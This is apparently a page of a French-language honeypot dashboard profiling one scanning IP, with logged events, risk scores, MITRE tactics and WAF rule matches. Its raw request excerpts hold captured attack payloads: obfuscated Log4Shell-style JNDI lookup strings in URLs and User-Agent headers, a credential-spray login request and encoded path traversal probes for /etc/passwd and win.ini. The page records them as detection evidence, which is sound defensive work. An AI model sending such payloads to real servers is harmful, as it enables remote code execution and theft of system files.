Profil de menace
Activité suspecte — risque 55/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Période analysée : 2026-07-02 → 2026-08-01
Activité suspecte — risque 55/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Campagne de scan — plusieurs IP du même /24 (34.19.127.0/24, ≥3 pairs)
Activité suspecte — risque 55/100 (Moyen) — MITRE TA0001 — confiance 64 % — via HTTP — campagne /24 (34.19.127.0/24)
Synthèse décisionnelle honeypot — seuil de listing maintenu à 1 événement qualifié.
Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance 64 % — Score WAF 72 · Bonus corrélation +10 · 3 tag(s) WAF
ASN 396982 · 34.19.0.0/17 · ARIN — 8 pair(s) ASN/FAI listé(s) — activité locale élevée vs pairs · 61 événements sur la période pour cette IP.
Même FAI Google LLC — corrélation indicative.
Cette IP touche plusieurs services simulés (pas seulement le web).
Origine réseau déclarée
Opérateur et dernière activité ban
Score capteur — surveiller, investiguer ou bloquer.
Les dates De/À priment sur la période. Affinez protocole, port, service et classification.
61 événements filtrés — activité quotidienne
Top ports ciblés sur les dernières 24 heures
SSH 22, RDP 3389, HTTP alternatifs…
Web, SSH, SAP, scans…
Intensité par jour et heure (UTC capteur)
61 événement(s) — page 2/2
| Horodatage | Proto | Port | Service | Classification | Sévérité | Risque | Actions |
|---|---|---|---|---|---|---|---|
| TCP | 9000 · HTTP | http | deser php attack deser php attack · via HTTP:9000 · (tentative d'exploit) · → /${${81:-j}${t3pr:-n}${26ok:-d}${pslg:rxgu:wc:-… | Élevée | Élevé · 68 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
PUT /${${81:-j}${t3pr:-n}${26ok:-d}${pslg:rxgu:wc:-i}${ixsr:u:-:}${bi:o60:-l}${l:b23:-d}${i:d:65:-a}${h… UA ${${b:e74:-j}${9:u:fup:-n}${z7i8:x0n:-d}${mi1e:d3c:x:-i}${1tok:…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
PUT
/${${81:-j}${t3pr:-n}${26ok:-d}${pslg:rxgu:wc:-i}${ixsr:u:-:}${bi:o60:-l}${l:b23:-d}${i:d:65:-a}${hg:-p}${0xf7:56:-:}${f2:j7pb:3:-/}${47b:-/}${dw:7se:-P}${p:-A}${r:kep:daf9:-l}${6:4ih9:kw45:-0}${0t1:-c}${r3:8a4:--}${${1fe:4vwt:-s}${k:v0b4:e:-y}${0axo:-s}${bzo:mld:7e:-:}${jv7:-j}${6h1:xge:-a}${6xm:-v}${wi:wn:-a}${yrd9:-.}${z:-v}${xu:-e}${j:p0li:-r}${luy:ct:phqz:-s}${zc:j0z:-i}${8wc:-o}${kf6:rgpk:sv:-n}}${s6b:-.}${9b:-a}${eif:-d}${n8:j9b:-c}${asn:8g2w:m3n5:-1}${bt3y:zfs:-6}${mt:1gt:96n8:-b}${x:8:g:-5}${nzr:-9
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
PUT
Port
9000
Chemin / cible
/${${81:-j}${t3pr:-n}${26ok:-d}${pslg:rxgu:wc:-i}${ixsr:u:-:}${bi:o60:-l}${l:b23:-d}${i:d:65:-a}${hg:-p}${0xf7:56:-:}${f2:j7pb:3:-/}${47b:-/}${dw:7se:-P}${p:-A…
Service
HTTP
Pourquoi cette classification : Type « deser_php_attack » (signaux protocolaires) · confiance 95%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 68
Confiance : Confiance 95 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0817
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
ET PHP serialize O:
CRS 933135
Ligne de requête
User-Agent
${${b:e74:-j}${9:u:fup:-n}${z7i8:x0n:-d}${mi1e:d3c:x:-i}${1tok:0h8:-:}${s78h:-l}${58b:fr:ecyx:-d}${7q:vw:-a}${l:p:-p}${oz:bky2:-:}${2cz:wi:-/}${2:oj:ni:-/}${4:5yrv:n0f:-U}${f:ex8:q35e:-A}${4g:ytz6:rb…
Règles WAF
rce-0
nosqli-3
Payload (extrait)
PUT /${${81:-j}${t3pr:-n}${26ok:-d}${pslg:rxgu:wc:-i}${ixsr:u:-:}${bi:o60:-l}${l:b23:-d}${i:d:65:-a}${hg:-p}${0xf7:56:-:}${f2:j7
Requête brute (extrait)
PUT /${${81:-j}${t3pr:-n}${26ok:-d}${pslg:rxgu:wc:-i}${ixsr:u:-:}${bi:o60:-l}${l:b23:-d}${i:d:65:-a}${hg:-p}${0xf7:56:-:}${f2:j7pb:3:-/}${47b:-/}${dw:7se:-P}${p:-A}${r:kep:daf9:-l}${6:4ih9:kw45:-0}${0t1:-c}${r3:8a4:--}${${1fe:4vwt:-s}${k:v0b4:e:-y}${0axo:-
|
|||||||
| TCP | 9000 · HTTP | http | deser php attack deser php attack · via HTTP:9000 · (tentative d'exploit) · → /${${zenx:bjwn:vi:-j}${ny3:-n}${a:-d}${4b7:v:-i… | Élevée | Élevé · 69 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
ZSDLKFJ2 /${${zenx:bjwn:vi:-j}${ny3:-n}${a:-d}${4b7:v:-i}${8:l78:i:-:}${yzbl:-l}${vz:a:-d}${rm6:s2ij:q4p1:-a… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
ZSDLKFJ2
/${${zenx:bjwn:vi:-j}${ny3:-n}${a:-d}${4b7:v:-i}${8:l78:i:-:}${yzbl:-l}${vz:a:-d}${rm6:s2ij:q4p1:-a}${4:7euw:-p}${wij:fu01:-:}${h:u7o:-/}${81ae:-/}${k:p6:1n:-P}${h:-A}${rw6:8o:18:-l}${8:-0}${0dg:-c}${iq:x:--}${${qv7:9g:r:-s}${j:4gl:-y}${v260:-s}${bg:n64z:p4uv:-:}${h7:-j}${l4i:r98:-a}${qp:akey:-v}${p8h:-a}${pl:4g:z:-.}${0c8:87zn:-v}${ocn:e6g8:-e}${k:-r}${7:-s}${wxms:g:-i}${g:-o}${abj:pi:pla7:-n}}${z:-.}${7jm:1imj:q:-a}${wn:-d}${ca:dfar:t1zi:-c}${0y:lk5:y:-1}${6q4:-6}${5:-b}${kwq:lfr2:i6:-5}${s:-9}${se:-6}${s
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
ZSDLKFJ2
Port
9000
Chemin / cible
/${${zenx:bjwn:vi:-j}${ny3:-n}${a:-d}${4b7:v:-i}${8:l78:i:-:}${yzbl:-l}${vz:a:-d}${rm6:s2ij:q4p1:-a}${4:7euw:-p}${wij:fu01:-:}${h:u7o:-/}${81ae:-/}${k:p6:1n:-P…
Service
HTTP
Pourquoi cette classification : Type « deser_php_attack » (signaux protocolaires) · confiance 97%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 69
Confiance : Confiance 97 % — Preuve dans le payload · Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0817
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
ET PHP serialize O:
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
ZSDLKFJ2 /${${zenx:bjwn:vi:-j}${ny3:-n}${a:-d}${4b7:v:-i}${8:l78:i:-:}${yzbl:-l}${vz:a:-d}${rm6:s2ij:q4p1:-a}${4:7euw:-p}${wij:f
Requête brute (extrait)
ZSDLKFJ2 /${${zenx:bjwn:vi:-j}${ny3:-n}${a:-d}${4b7:v:-i}${8:l78:i:-:}${yzbl:-l}${vz:a:-d}${rm6:s2ij:q4p1:-a}${4:7euw:-p}${wij:fu01:-:}${h:u7o:-/}${81ae:-/}${k:p6:1n:-P}${h:-A}${rw6:8o:18:-l}${8:-0}${0dg:-c}${iq:x:--}${${qv7:9g:r:-s}${j:4gl:-y}${v260:-s}${
|
|||||||
| TCP | 9000 · HTTP | http | Spray credentials bruteforce credential spray · via HTTP:9000 · (sonde / probe) · → /login | Élevée | Élevé · 68 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1078
TA0007
TA0001
Protocole
POST /login UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
POST
/login
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
9000
Chemin / cible
/login
Service
HTTP
Pourquoi cette classification : Type « bruteforce_credential_spray » (signaux protocolaires) · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 68
Confiance : Confiance 100 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1078
Beh Cred Stuff
Technique MITRE
T1078
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 921130 duplicate CL
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Int
Requête brute (extrait)
POST /login HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Content-Length: 2841 Content-Type: |
|||||||
| TCP | 9000 · HTTP | http | Sonde port 9000/TCP port 9000 tcp · via HTTP:9000 · (sonde / probe) · → /${${w5:-j}${l1:3ebg:t:-n}${dqf:-d}${dp:qoi:pb2… | Élevée | Moyen · 59 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /${${w5:-j}${l1:3ebg:t:-n}${dqf:-d}${dp:qoi:pb2h:-i}${6s:q8ej:-:}${fp:i:-l}${e:h:s:-d}${nv5i:ogu:-a… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${w5:-j}${l1:3ebg:t:-n}${dqf:-d}${dp:qoi:pb2h:-i}${6s:q8ej:-:}${fp:i:-l}${e:h:s:-d}${nv5i:ogu:-a}${s:-p}${g:8:k1y:-:}${5tg:z6:-/}${xn29:b:n8g:-/}${0:-P}${1l:fi:-A}${a3:lc8:-l}${t:5wsd:bf94:-0}${n:ra:-c}${w7le:d3n:ngv9:--}${${b0:-s}${8g:tw:2zu1:-y}${j:-s}${th4:-:}${457u:4v:klyv:-j}${fw0v:-a}${49df:c3s:-v}${z:h4:lmr:-a}${ad:9s:-.}${wp:-v}${1:nhrq:-e}${8q1:-r}${4p:6jfu:rof1:-s}${h:-i}${bjwc:drw:xc20:-o}${41:0w1:uhkj:-n}}${atm:zqv:-.}${u27:-a}${q:dp:s27:-d}${eo:-c}${k2:r:6e:-1}${6ei7:lp8:-6}${3l02:e:-b}${iet
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9000
Chemin / cible
/${${w5:-j}${l1:3ebg:t:-n}${dqf:-d}${dp:qoi:pb2h:-i}${6s:q8ej:-:}${fp:i:-l}${e:h:s:-d}${nv5i:ogu:-a}${s:-p}${g:8:k1y:-:}${5tg:z6:-/}${xn29:b:n8g:-/}${0:-P}${1l…
Preuve honeypot — Sonde port 9000/TCP
Connexion détectée sur le port 9000 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_9000_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 59
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${w5:-j}${l1:3ebg:t:-n}${dqf:-d}${dp:qoi:pb2h:-i}${6s:q8ej:-:}${fp:i:-l}${e:h:s:-d}${nv5i:ogu:-a}${s:-p}${g:8:k1y:-:}${5t
Requête brute (extrait)
GET /${${w5:-j}${l1:3ebg:t:-n}${dqf:-d}${dp:qoi:pb2h:-i}${6s:q8ej:-:}${fp:i:-l}${e:h:s:-d}${nv5i:ogu:-a}${s:-p}${g:8:k1y:-:}${5tg:z6:-/}${xn29:b:n8g:-/}${0:-P}${1l:fi:-A}${a3:lc8:-l}${t:5wsd:bf94:-0}${n:ra:-c}${w7le:d3n:ngv9:--}${${b0:-s}${8g:tw:2zu1:-y}${
|
|||||||
| TCP | 9000 · HTTP | http | deser php attack deser php attack · via HTTP:9000 · (tentative d'exploit) · → /${${6:-j}${c:-n}${0:n:2mk:-d}${lt:nmej:fln:-i}… | Élevée | Élevé · 68 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /${${6:-j}${c:-n}${0:n:2mk:-d}${lt:nmej:fln:-i}${ysi1:1q:vtf7:-:}${m1:r:d61x:-l}${u3gb:h:wl4o:-d}${… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/${${6:-j}${c:-n}${0:n:2mk:-d}${lt:nmej:fln:-i}${ysi1:1q:vtf7:-:}${m1:r:d61x:-l}${u3gb:h:wl4o:-d}${x:h57u:rvi7:-a}${fuo:ibe:-p}${qh6z:e82b:2n:-:}${g0q:2:-/}${7:-/}${xmq:-P}${7:i3we:-A}${p:g:-l}${tkpj:-0}${dz:q:whc:-c}${k:--}${${8a0:z:-s}${3:8p:-y}${ch:-s}${adx8:axe:-:}${b:-j}${q:ws0i:-a}${u24s:-v}${n1yv:-a}${8:mof:-.}${w:b5:4m8:-v}${57o:ul:3z:-e}${v8:mz:-r}${p:gub:ck94:-s}${r:na:-i}${i8:4:i:-o}${qk:on:g:-n}}${wjo:89:v32n:-.}${r:81v:q:-a}${d:0lg9:9:-d}${t2lj:-c}${40:-1}${g6uh:b:05:-6}${vl2:kx5:-b}${v:-5}${8z
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9000
Chemin / cible
/${${6:-j}${c:-n}${0:n:2mk:-d}${lt:nmej:fln:-i}${ysi1:1q:vtf7:-:}${m1:r:d61x:-l}${u3gb:h:wl4o:-d}${x:h57u:rvi7:-a}${fuo:ibe:-p}${qh6z:e82b:2n:-:}${g0q:2:-/}${7…
Service
HTTP
Pourquoi cette classification : Type « deser_php_attack » (signaux protocolaires) · confiance 95%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 68
Confiance : Confiance 95 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0817
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
ET PHP serialize O:
CRS 933135
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /${${6:-j}${c:-n}${0:n:2mk:-d}${lt:nmej:fln:-i}${ysi1:1q:vtf7:-:}${m1:r:d61x:-l}${u3gb:h:wl4o:-d}${x:h57u:rvi7:-a}${fuo:ibe:
Requête brute (extrait)
GET /${${6:-j}${c:-n}${0:n:2mk:-d}${lt:nmej:fln:-i}${ysi1:1q:vtf7:-:}${m1:r:d61x:-l}${u3gb:h:wl4o:-d}${x:h57u:rvi7:-a}${fuo:ibe:-p}${qh6z:e82b:2n:-:}${g0q:2:-/}${7:-/}${xmq:-P}${7:i3we:-A}${p:g:-l}${tkpj:-0}${dz:q:whc:-c}${k:--}${${8a0:z:-s}${3:8p:-y}${ch:
|
|||||||
| TCP | 9000 · HTTP | http | Sonde port 9000/TCP port 9000 tcp · via HTTP:9000 · (sonde / probe) | Élevée | Moyen · 45 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
POST / UA ${${9:930l:-j}${l:g:hr:-n}${yv:8:sk5:-d}${qw1:5:49qu:-i}${ciy:v…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
POST
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
POST
Port
9000
Chemin / cible
/
Preuve honeypot — Sonde port 9000/TCP
Connexion détectée sur le port 9000 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_9000_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 45
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${9:930l:-j}${l:g:hr:-n}${yv:8:sk5:-d}${qw1:5:49qu:-i}${ciy:v3:env:-:}${z:e:il9m:-l}${7k:ewjo:-d}${9y:-a}${xq4g:y:61th:-p}${4:-:}${z:1:-/}${if:bg0p:-/}${0be:4:-U}${qp:rwa:-A}${vm6:-l}${z5f:-0}${l7:…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
POST / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9000
Accept: */*
User-Agent: ${${9:930l:-j}${l:g:hr:-n}${yv:8
Requête brute (extrait)
POST / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9000 Accept: */* User-Agent: ${${9:930l:-j}${l:g:hr:-n}${yv:8:sk5:-d}${qw1:5:49qu:-i}${ciy:v3:env:-:}${z:e:il9m:-l}${7k:ewjo:-d}${9y:-a}${xq4g:y:61th:-p}${4:-:}${z:1:-/}${if:bg0p:-/}${0be:4
|
|||||||
| TCP | 9000 · HTTP | http | Sonde port 9000/TCP port 9000 tcp · via HTTP:9000 · (sonde / probe) | Élevée | Moyen · 45 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA ${${gzf:-j}${vz:-n}${we8:s3:-d}${ken:4u:m:-i}${7l:2jlh:a:-:}${v…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9000
Chemin / cible
/
Preuve honeypot — Sonde port 9000/TCP
Connexion détectée sur le port 9000 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_9000_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 45
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
Ligne de requête
User-Agent
${${gzf:-j}${vz:-n}${we8:s3:-d}${ken:4u:m:-i}${7l:2jlh:a:-:}${v:-l}${3y2n:sto:-d}${35:kfoh:7r:-a}${8:xct:kiq:-p}${dogi:gj6:rp:-:}${usfr:-/}${m97:-/}${6:a:-U}${uj:f:1:-A}${xnz:a:-l}${po9d:qh:z58q:-0}$…
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1
Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9000
Accept: */*
User-Agent: ${${gzf:-j}${vz:-n}${we8:s3:-d}${
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9000 Accept: */* User-Agent: ${${gzf:-j}${vz:-n}${we8:s3:-d}${ken:4u:m:-i}${7l:2jlh:a:-:}${v:-l}${3y2n:sto:-d}${35:kfoh:7r:-a}${8:xct:kiq:-p}${dogi:gj6:rp:-:}${usfr:-/}${m97:-/}${6:a:-U}${uj
|
|||||||
| TCP | 9000 · HTTP | http | Sonde port 9000/TCP port 9000 tcp · via HTTP:9000 · (sonde / probe) | Élevée | Moyen · 47 |
|
|
|
Étape
Sonde / probe
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
9000
Chemin / cible
/
Preuve honeypot — Sonde port 9000/TCP
Connexion détectée sur le port 9000 (TCP) du capteur simulé.
Service
HTTP
Pourquoi cette classification : Type « port_9000_tcp » (signaux protocolaires) · confiance 50%
Confiance classification
60%
Corrélation +10
Risque capteur
Moyen
· 47
Confiance : Confiance 50 % — Motif catalogue confirmé · Classification nommée non retenue — preuves insuffisantes · 3 tag(s) WAF
Protocole émulé
1
Signaux
pat-0162
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Motifs de détection (base)
CRS 933135
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:9000 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 X-Forwarded-For: ${${tbq:-j}${r:5haz:-n}${
|
|||||||
| TCP | 10250 · HTTP | http | SSRF interne ssrf internal · via HTTP:10250 · (tentative d'exploit) | Élevée | Moyen · 54 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
16
Recommandation
Investiguer
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
10250
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
64%
Corrélation +10
Risque capteur
Moyen
· 54
Confiance : Confiance 54 % — Motif catalogue confirmé · 3 tag(s) WAF
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10250 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Ma
Requête brute (extrait)
GET / HTTP/1.1 Host: ip-62-3-50-33.v4.isp.servpersosystems.net:10250 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 |
|||||||
| TCP | 81 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:81 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
81
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
Http Lfi
pat-0715
CRS-930100-sub
Upstream
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930150 boot ini
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Règles WAF
lfi-0
lfi-1
rce-0
nosqli-3
Payload (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/wi
Requête brute (extrait)
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/Windows/win.ini HTTP/1.1 Host: 62.3.50.33:81 Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 |
|||||||
| TCP | 81 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:81 · (tentative d'exploit) · → /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%… | Élevée | Élevé · 70 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Reconnaissance
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/… UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537…
Émulateur
HTTP
WAF
35
Recommandation
Investiguer
Tags
Cible HTTP
GET
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
81
Chemin / cible
/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: traversal ../ · Règle WAF « lfi-0 » · Traversal / LFI dans le chemin · confiance 100%
Confiance classification
100%
Corrélation +10
Risque capteur
Élevé
· 70
Confiance : Confiance 100 % — Motif catalogue confirmé · 5 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1083
Http Lfi
pat-0716
pat-0137
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930160 etc passwd
LFI path /etc/passwd
Ligne de requête
User-Agent
